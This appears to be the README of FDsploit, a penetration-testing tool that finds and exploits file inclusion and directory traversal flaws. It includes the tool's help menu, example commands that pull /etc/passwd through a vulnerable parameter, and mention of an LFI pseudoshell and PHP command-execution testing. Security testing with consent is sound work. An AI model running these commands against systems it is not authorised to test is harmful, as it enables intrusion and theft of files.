

<img src="images/logo.png" width="45%">
A File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.

GPLv3 license version Known Vulnerabilities

FDsploit menu:

$ python fdsploit.py -h

     _____ ____          _     _ _
    |   __|    \ ___ ___| |___|_| |_
    |   __|  |  |_ -| . | | . | |  _|
    |__|  |____/|___|  _|_|___|_|_|
                    |_|...ver. 1.2
                          Author: Christoforos Petrou (game0ver) !

usage: fdsploit.py [-u  | -f ] [-h] [-p] [-d] [-e {0,1,2}] [-t] [-b] [-x] [-c]
                   [-v] [--params  [...]] [-k] [-a] [--cmd]
                   [--lfishell {None,simple,expect,input}]

FDsploit.py: Automatic (L|R)FI & directory traversal enumeration & exploitation.

Required (one of the following):
  -u , --url            Specify a url or
  -f , --file           Specify a file containing urls

  -h, --help            Show this help message and exit
  -p , --payload        Specify a payload-file to look for [default None]
  -d , --depth          Specify max depth for payload [default 5]
  -e {0,1,2}, --urlencode {0,1,2}
                        Url-encode the payload [default: False]
  -t , --tchar          Use a termination character ('%00' or '?') [default None]
  -b, --b64             Use base64 encoding [default False]
  -x , --proxy          Specify a proxy to use [form: host:port]
  -c , --cookie         Specify a session-cookie to use [default None]
  -v , --verb           Specify request type ('GET' or 'POST') [default GET]
  --params  [ ...]      Specify POST parameters to use (applied only with POST requests)
                        Form: param1:value1,param2:value2,...
  -k , --keyword        Search for a certain keyword(s) on the response [default: None]
  -a, --useragent       Use a random user-agent [default user-agent: FDsploit_1.2_agent]
  --cmd                 Test for command execution through PHP functions [default command: None]
  --lfishell {None,simple,expect,input}
                        LFI pseudoshell [default None]

[!] For More Details please read the README.md file!
<!-- <img src="images/FDsploit.png" width="70%"> -->

FDsploit can be used to discover and exploit Local/Remote File Inclusion and directory traversal vulnerabilities automatically. In case an LFI vulnerability is found, --lfishell option can be used to exploit it. For now, 3 different types of LFI shells are supported:

So far, there are only two lfi-shell built-in commands:


Some Examples

1. Directory traversal vulnerability discovery:

From the below output it seems that the directory parameter is probably vulnerable to directory traversal vulnerability since every request with ../ as payload produces a different sha-256 hash. Also the content-length is different for every request:

./fdsploit.py -u '' -c 'PHPSESSID=7acf1c5311fee614d0eb40d7f3473087; security_level=0' -d 8
<img src="images/directory_traversal.png" width="70%">

2. LFI vulnerability discovery:

Again, the language parameter seems vulnerable to LFI since using ../etc/passwd etc.. as payload, every request being colored with green produces a different hash, a different content-length from the initial, and the keyword specified is found in the response:

./fdsploit.py -u '*&action=go' -c 'PHPSESSID=7acf1c5311fee614d0eb40d7f3473087; security_level=0' -d 7 -k root -p /etc/passwd
<img src="images/lfi.png" width="70%">

3. LFI exploitation using simple shell:

Exploiting the above LFI using simple shell:

<img src="images/simpleshell.png" width="70%">


  1. When POST verb is used, --params option must also be specified.
  2. To test for Directory Traversal vulnerability the --payload option must be left to default value (None).
  3. When --file options is used for multiple-urls testing, then only GET request is supported.
  4. When both --file & --cookie options are set then since only one cookie can be specified each time the urls must refer on the same domain or be accessible without a cookie (that's is going to be fixed in a future update).
  5. input shell is not compatible with POST verb.


Note: To install the requirements:

pip install -r requirements.txt --upgrade --user

💡 FDsploit also comes pre-installed with BlackArch Linux distribution.


Contributions & Feedback

Feedback and contributions are welcome. If you find any bug or have a feature request feel free to open an issue, and as soon as I review it I'll try to fix it!


This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software in general.



This project is licensed under the GPLv3 License - see the LICENSE file for details